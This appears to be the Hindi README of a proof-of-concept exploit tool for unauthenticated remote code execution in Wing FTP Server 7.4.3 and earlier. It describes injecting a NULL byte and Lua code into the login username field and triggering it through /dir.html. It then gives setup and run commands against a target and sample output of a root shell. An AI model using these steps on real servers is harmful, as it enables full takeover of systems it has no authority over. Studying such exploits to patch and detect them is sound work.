
Wing FTP Server <= 7.4.3 में अप्रमाणित रिमोट कोड निष्पादन भेद्यता।
Wing FTP Server <= 7.4.3 में बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता। लॉगिन के दौरान
usernameपैरामीटर में एक NULL बाइट इंजेक्ट करने से Lua कोड सेशन फ़ाइल में लिखा जाता है। जब परिणामी सेशन कुकी के साथ/dir.htmlतक पहुँचा जाता है, तो इंजेक्टेड कोड निष्पादित होता है — Linux पर रूट या Windows पर SYSTEM के रूप में।
/loginok.html पर username फ़ील्ड में NULL बाइट और उसके बाद Lua कोड इंजेक्ट करता है।/dir.html पर GET अनुरोध इंजेक्टेड Lua कोड के निष्पादन को ट्रिगर करता है।python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
उदाहरण:
$ python3 exploit.py -u http://10.10.10.10
[*] लक्ष्य http://10.10.10.10
[*] इंजेक्टेड पेलोड के साथ लॉगिन कर रहा है...
[*] पेलोड ट्रिगर कर रहा है...
[+] लक्ष्य असुरक्षित है! कमांड आउटपुट:
uid=0(root) gid=0(root) groups=0(root)
[+] शेल खोला गया। बाहर निकलने के लिए 'exit' या Ctrl+C टाइप करें।
Shell> whoami
root